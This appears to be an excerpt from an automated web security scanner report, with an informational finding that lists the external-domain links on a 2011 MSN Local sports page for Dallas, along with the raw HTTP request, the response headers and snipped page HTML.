<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207">Yellow pages</a>
...[SNIP]...
<img width="16" height="20" alt="twitter" title="twitter" src="http://blstb.msn.com/i/95/2845F8ED7FD4376D1898516E22F8.png" /><a href="http://www.bing.com/twitter/search?go=&form=MSNLEC&q=Dallas,TX">Read Local Tweets</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=yiVCumGs&resize=false">Feedback</a>
...[SNIP]...

17.135. http://local.msn.com/sports.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/sports.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.msn.com/sports.aspx?zip=75207&q=75207

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/cbk/standings
http://msn.foxsports.com/cbk/story/Air-Force-66-TCU-65-64413866
http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175
http://msn.foxsports.com/cbk/story/Colorado-St-79-TCU-69-99128904
http://msn.foxsports.com/cbk/story/Defense-is-the-name-of-the-game-in-Big-12-54140452
http://msn.foxsports.com/cbk/story/Denver-80-North-Texas-67-66077993
http://msn.foxsports.com/cbk/story/Jimmermania-highlights-seasons-top-performances-13336281
http://msn.foxsports.com/cbk/story/Kansas-St-69-Baylor-61-11058486
http://msn.foxsports.com/cbk/story/KansasTexas-Tech-Preview-16250128
http://msn.foxsports.com/cbk/story/Lamar-76-TexasArlington-72-22113261
http://msn.foxsports.com/cbk/story/LouisianaLafayette-93-North-Texas-88-50545535
http://msn.foxsports.com/cbk/story/LouisianaLafayette-defeats-North-Texas-9388-18092539
http://msn.foxsports.com/cbk/story/No-9-BYU-83-TCU-67-33157554
http://msn.foxsports.com/cbk/story/North-Texas-83-Arkansas-St-64-96725786
http://msn.foxsports.com/cbk/story/Oneanddone-6plus-players-who-might-leave-quick-78004338
http://msn.foxsports.com/cbk/story/SMU-59-Tulsa-58-81254706
http://msn.foxsports.com/cbk/story/SMU-75-Rice-68-35158885
http://msn.foxsports.com/cbk/story/SMU-79-Southern-Miss-65-96624346
http://msn.foxsports.com/cbk/story/Texas-Longhorns-topple-Missouri-Tigers-012911
http://msn.foxsports.com/cbk/story/Texas-Tech-75-Oklahoma-St-74-80642690
http://msn.foxsports.com/cbk/story/Texas-Tech-92-Iowa-St-83-37630109
http://msn.foxsports.com/cbk/story/Texas-trounces-Texas-A&M-for-Big-12-win-013111
http://msn.foxsports.com/cbk/story/TexasArlington-62-Stephen-FAustin-52-85322240
http://msn.foxsports.com/cbk/story/TexasArlington-70-Texas-AampMCorpus-Christi-49-49303869
http://msn.foxsports.com/cbk/story/TexasArlington-83-Texas-St-66-30375558
http://msn.foxsports.com/cbk/story/TexasTexas-AM-Preview-33061025
http://msn.foxsports.com/cbk/story/UAB-67-SMU-53-71299212
http://msn.foxsports.com/cbk/story/Utah-75-TCU-62-52354638
http://msn.foxsports.com/cbk/story/kansas-jayhawks-defeat-texas-tech-red-raiders-020111
http://msn.foxsports.com/cbk/team?categoryId=71650
http://msn.foxsports.com/cbk/team?categoryId=71780
http://msn.foxsports.com/cbk/team?categoryId=71871
http://msn.foxsports.com/cbk/team?categoryId=71872
http://msn.foxsports.com/cbk/team?categoryId=71874
http://msn.foxsports.com/cbk/team?categoryId=71922
http://msn.foxsports.com/cbk/team?categoryId=71926
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71650
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71780
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71871
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71872
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71874
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71922
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71926
http://msn.foxsports.com/cbk/teamStats?categoryId=71650
http://msn.foxsports.com/cbk/teamStats?categoryId=71780
http://msn.foxsports.com/cbk/teamStats?categoryId=71871
http://msn.foxsports.com/cbk/teamStats?categoryId=71872
http://msn.foxsports.com/cbk/teamStats?categoryId=71874
http://msn.foxsports.com/cbk/teamStats?categoryId=71922
http://msn.foxsports.com/cbk/teamStats?categoryId=71926
http://msn.foxsports.com/cfb
http://msn.foxsports.com/cfb/standings
http://msn.foxsports.com/cfb/story/AP-AllAmerica-Team-List-25730143
http://msn.foxsports.com/cfb/story/Army-holds-on-to-beat-SMU-in-the-Armed-Forces-Bowl-123010
http://msn.foxsports.com/cfb/story/ArmySMU-Preview-75693926
http://msn.foxsports.com/cfb/story/Bears-make-first-bowl-appearance-since-1994-47130273
http://msn.foxsports.com/cfb/story/Canadian-jumps-from-fire-to-pro-football-88154560
http://msn.foxsports.com/cfb/story/Illinois-beats-Baylor-for-rare-bowl-win-122910
http://msn.foxsports.com/cfb/story/Kansas-St-49-North-Texas-41-86875018
http://msn.foxsports.com/cfb/story/Leshoure-leads-Illinois-past-Baylor-in-Texas-Bowl-67062026
http://msn.foxsports.com/cfb/story/Mike-Leach-lawsuit-thrown-out-against-Texas-Tech-012111
http://msn.foxsports.com/cfb/story/Mike-Leach-thought-he-was-perfect-fit-for-Maryland-010411
http://msn.foxsports.com/cfb/story/NCAA-Texas-Tech-broke-recruiting-rules-in-three-sports-010711
http://msn.foxsports.com/cfb/story/No-13-Virginia-Tech-37-Virginia-7-30594865
http://msn.foxsports.com/cfb/story/Ponder-South-win-Senior-Bowl-2410-10241756
http://msn.foxsports.com/cfb/story/Reserves-key-to-titles-bowls-for-some-ACC-teams-22352730
http://msn.foxsports.com/cfb/story/Rose-Bowl-is-more-than-Badgers-size-Frogs-speed-90645669
http://msn.foxsports.com/cfb/story/Senior-Bowl-Christian-Ponder-South-victory-012911
http://msn.foxsports.com/cfb/story/TCU-holds-off-Wisconsin-to-win-Rose-Bowl-
http://msn.foxsports.com/cfb/story/Texas-DE-Acho-wins-scholarathlete-award-52030010
http://msn.foxsports.com/cfb/story/Texas-Tech-45-Northwestern-38-91337506
http://msn.foxsports.com/cfb/story/Tuneup-for-Hokies-is-Cavaliers-bowl-game-90790195
http://msn.foxsports.com/cfb/story/UCF-SMU-meet-for-Conference-USA-championship-36668645
http://msn.foxsports.com/cfb/story/UCF-edges-SMU-in-Conference-USA-Championship-Game-120410
http://msn.foxsports.com/cfb/story/Unbeaten-TCU-stops-Wisconsin-2119-in-Rose-Bowl-96857989
http://msn.foxsports.com/cfb/story/WisconsinTCU-Preview-82908187
http://msn.foxsports.com/cfb/team?categoryId=86068
http://msn.foxsports.com/cfb/team?categoryId=86111
http://msn.foxsports.com/cfb/team?categoryId=86112
http://msn.foxsports.com/cfb/team?categoryId=86127
http://msn.foxsports.com/cfb/team?categoryId=86128
http://msn.foxsports.com/cfb/team?categoryId=86138
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86068
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86111
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86112
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86127
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86128
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86138
http://msn.foxsports.com/cfb/teamStats?categoryId=86068
http://msn.foxsports.com/cfb/teamStats?categoryId=86111
http://msn.foxsports.com/cfb/teamStats?categoryId=86112
http://msn.foxsports.com/cfb/teamStats?categoryId=86127
http://msn.foxsports.com/cfb/teamStats?categoryId=86128
http://msn.foxsports.com/cfb/teamStats?categoryId=86138
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5357.gif
http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5726.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/415.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/50.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/515.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/576.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/585.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/588.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/592.gif
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/182.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/79.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/82.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/83.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/85.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/86.png
http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/13.gif
http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/18.gif
http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/10.png
http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/24.png
http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/6.png
http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/34.png
http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/6.png
http://msn.foxsports.com/fe/img/NHL/TeamLogo/Large/9.png
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/50.gif
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/515.gif
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/576.gif
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/585.gif
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/592.gif
http://msn.foxsports.com/fe/img/WNBA/TeamLogo/Large/8.gif
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/foxsoccer/mls
http://msn.foxsports.com/foxsoccer/mls/standings
http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377
http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/mlb/standings
http://msn.foxsports.com/mlb/story/Astros-infielder-Keppinger-to-have-foot-surgery-48484608
http://msn.foxsports.com/mlb/story/Astros-pitcher-Carrillo-arrested-at-Fla-casino-03199288
http://msn.foxsports.com/mlb/story/Baltimore-Orioles-Vladimir-Guerrero-contract-offer-012911
http://msn.foxsports.com/mlb/story/Francicso-signs-oneyear-deal-with-Blue-Jays-27438403
http://msn.foxsports.com/mlb/story/Houston-Astros-reach-34M-3-year-deal-with-RHP-Wandy-Rodriguez-012511
http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420
http://msn.foxsports.com/mlb/story/Rangers-trade-Francisco-to-Blue-Jays-for-Napoli-03177108
http://msn.foxsports.com/mlb/story/Salary-Arbitration-Eligibles-List
http://msn.foxsports.com/mlb/team/houston-astros
http://msn.foxsports.com/mlb/team/houston-astros/schedule
http://msn.foxsports.com/mlb/team/houston-astros/stats
http://msn.foxsports.com/mlb/team/texas-rangers
http://msn.foxsports.com/mlb/team/texas-rangers/schedule
http://msn.foxsports.com/mlb/team/texas-rangers/stats
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nba/standings
http://msn.foxsports.com/nba/story/Dallas-Mavericks-take-down-Atlanta-Hawks--12911
http://msn.foxsports.com/nba/story/Los-Angeles-Lakers-Kobe-Bryant-outlast-Houston-Rockets-in-overtime-020111
http://msn.foxsports.com/nba/story/Mavericks-102-Wizards-92-01372633
http://msn.foxsports.com/nba/story/MavericksKnicks-Preview-52949900
http://msn.foxsports.com/nba/story/Portland-Trail-Blazers-stun-NBA-best-San-Antonio-Spurs-behind-Lamarcus-Aldridges-40-points-020111
http://msn.foxsports.com/nba/story/RocketsJazz-Preview-28579422
http://msn.foxsports.com/nba/story/RocketsLakers-Preview-62348378
http://msn.foxsports.com/nba/story/San-Antonio-Spurs-top-Houston-Rockets-012911
http://msn.foxsports.com/nba/story/SpursTrail-Blazers-Preview-94032532
http://msn.foxsports.com/nba/story/Stats-or-wins-Duncans-AllStar-spot-is-at-stake-32880345
http://msn.foxsports.com/nba/story/WizardsMavericks-Preview-74049944
http://msn.foxsports.com/nba/team/dallas-mavericks
http://msn.foxsports.com/nba/team/dallas-mavericks/schedule
http://msn.foxsports.com/nba/team/dallas-mavericks/stats
http://msn.foxsports.com/nba/team/houston-rockets
http://msn.foxsports.com/nba/team/houston-rockets/schedule
http://msn.foxsports.com/nba/team/houston-rockets/stats
http://msn.foxsports.com/nba/team/san-antonio-spurs
http://msn.foxsports.com/nba/team/san-antonio-spurs/schedule
http://msn.foxsports.com/nba/team/san-antonio-spurs/stats
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nfl/standings
http://msn.foxsports.com/nfl/story/AP-source-Texans-hire-Herring-to-coach-LBs-30897071
http://msn.foxsports.com/nfl/story/Brees-Zimmer-win-PFWA-Awards-52258753
http://msn.foxsports.com/nfl/story/Eagles-WR-Jackson-replaced-by-Austin-in-Pro-Bowl-52325786
http://msn.foxsports.com/nfl/story/Goodell-skips-Pro-Bowl-to-focus-on-new-contract-60632089
http://msn.foxsports.com/nfl/story/Howdy-A-Big-D-welcome-to-Packers-Steelers-35730692
http://msn.foxsports.com/nfl/story/NFL-NFC-AFC-Pro-Bowl-first-timers-soaking-it-all-in-012811
http://msn.foxsports.com/nfl/story/Police-watch-for-sex-trafficking-ahead-of-big-game-58165206
http://msn.foxsports.com/nfl/story/pro-bowl-players-hoping-game-stays-in-hawaii-012911
http://msn.foxsports.com/nfl/team/dallas-cowboys
http://msn.foxsports.com/nfl/team/dallas-cowboys/schedule
http://msn.foxsports.com/nfl/team/dallas-cowboys/stats
http://msn.foxsports.com/nfl/team/houston-texans
http://msn.foxsports.com/nfl/team/houston-texans/schedule
http://msn.foxsports.com/nfl/team/houston-texans/stats
http://msn.foxsports.com/nhl
http://msn.foxsports.com/nhl/standings
http://msn.foxsports.com/nhl/story/AllStars-11-AllStars-10-09051499
http://msn.foxsports.com/nhl/story/Big-night-for-Blackhawks-at-NHL-AllStar-game-44649940
http://msn.foxsports.com/nhl/story/Canucks-4-Stars-1-09236511
http://msn.foxsports.com/nhl/story/CanucksStars-Preview-69558990
http://msn.foxsports.com/nhl/team/dallas-stars
http://msn.foxsports.com/nhl/team/dallas-stars/schedule/
http://msn.foxsports.com/nhl/team/dallas-stars/stats/
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.foxsports.com/wcbk
http://msn.foxsports.com/wcbk/schedule
http://msn.foxsports.com/wcbk/standings
http://msn.foxsports.com/wcbk/statsTeam
http://msn.foxsports.com/wcbk/story/Baylor-Lady-Bears-Roster-34247840
http://msn.foxsports.com/wcbk/story/Baylors-future-bright-for-Griner-young-Bears-60468229
http://msn.foxsports.com/wcbk/story/CONNECTICUT-370-61746829
http://msn.foxsports.com/wcbk/story/Fewest-Points-in-One-Half-NCAA-Tournament-07292331
http://msn.foxsports.com/wcbk/story/NCAA-Championship-Scores-81750110
http://msn.foxsports.com/wcbk/story/NCAA-Womens-Final-Four-MVPs-25159731
http://msn.foxsports.com/wcbk/story/National-Team-Leaders
http://msn.foxsports.com/wcbk/story/National-Team-Leaders3
http://msn.foxsports.com/wcbk/story/Nebraskas-Yori-chosen-AP-coach-of-the-year-90044251
http://msn.foxsports.com/wcbk/story/No-20-TCU-78-Colorado-St-51-34049731
http://msn.foxsports.com/wcbk/story/No-22-TCU-80-San-Diego-St-63-56753002
http://msn.foxsports.com/wcbk/story/No-23-TCU-81-UNLV-61-58963977
http://msn.foxsports.com/wcbk/story/OKLAHOMA-2710-68082171
http://msn.foxsports.com/wcbk/story/Womens-NCAA-AllTournament-Teams-37687435
http://msn.foxsports.com/wcbk/story/Womens-NCAA-Championship-Winningest-Coaches-87055644
http://msn.foxsports.com/wcbk/story/Wyoming-73-No-22-TCU-67-02071027
http://msn.foxsports.com/wnba
http://msn.foxsports.com/wnba/schedule
http://msn.foxsports.com/wnba/standings
http://msn.foxsports.com/wnba/stats
http://msn.foxsports.com/wnba/story/Leuchanka-leads-Belarus-to-7053-upset-of-Russia-67166762
http://msn.foxsports.com/wnba/story/Mercury-92-Silver-Stars-73-19788864
http://msn.foxsports.com/wnba/story/Silver-Stars-92,-Mercury-91
http://msn.foxsports.com/wnba/story/USA-aims-to-reclaim-gold-at-womens-hoops-worlds-21153241
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/events/search?q=events near 75207&p1=[Events+source="vertical"+qzeventid="f579394"]&form=MSNLAP
http://www.bing.com/events/search?q=events near 75207&p1=[Events+source="vertical"+qzeventid="z155484965"]&form=MSNLAP
http://www.bing.com/events/search?q=events near 75207&p1=[Events+source="vertical"+qzeventid="z157228725"]&form=MSNLAP
http://www.bing.com/events/search?q=events near 75207&p1=[Events+source="vertical"+qzeventid="z161455405"]&form=MSNLAP
http://www.bing.com/events/search?q=events near 75207&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660836&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Fsports.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=MhTrwKXH&resize=false
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /sports.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:56 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA25
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ff79b720ef73400184bb0fdcaf98bb19; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1CD2111FD694440CA37874A00FC44F64; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:56 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 94777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660836&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Fsports.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC">Wednesday, Feb. 02, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomemsn.com/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207">Yellow pages</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys" title="Dallas Cowboys"><img src="http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/6.png" alt="Dallas Cowboys logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys">Dallas Cowboys</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/story/Police-watch-for-sex-trafficking-ahead-of-big-game-58165206">Police watch for sex trafficking ahead of big game</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Eagles-WR-Jackson-replaced-by-Austin-in-Pro-Bowl-52325786">Eagles WR Jackson replaced by Austin in Pro Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Goodell-skips-Pro-Bowl-to-focus-on-new-contract-60632089">Goodell skips Pro Bowl to focus on new contract</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/story/Howdy-A-Big-D-welcome-to-Packers-Steelers-35730692">Howdy! A Big D welcome to Packers, Steelers</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/team/houston-texans" title="Houston Texans"><img src="http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/34.png" alt="Houston Texans logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nfl/team/houston-texans">Houston Texans</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/story/pro-bowl-players-hoping-game-stays-in-hawaii-012911">Players hoping Pro Bowl stays in Hawaii</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/NFL-NFC-AFC-Pro-Bowl-first-timers-soaking-it-all-in-012811">First-time Pro Bowlers soaking it all in</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Brees-Zimmer-win-PFWA-Awards-52258753">AP's NFL Awards on NFL Network during SB week</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/story/AP-source-Texans-hire-Herring-to-coach-LBs-30897071">AP source: Texans hire Herring to coach LBs</a>
...[SNIP]...
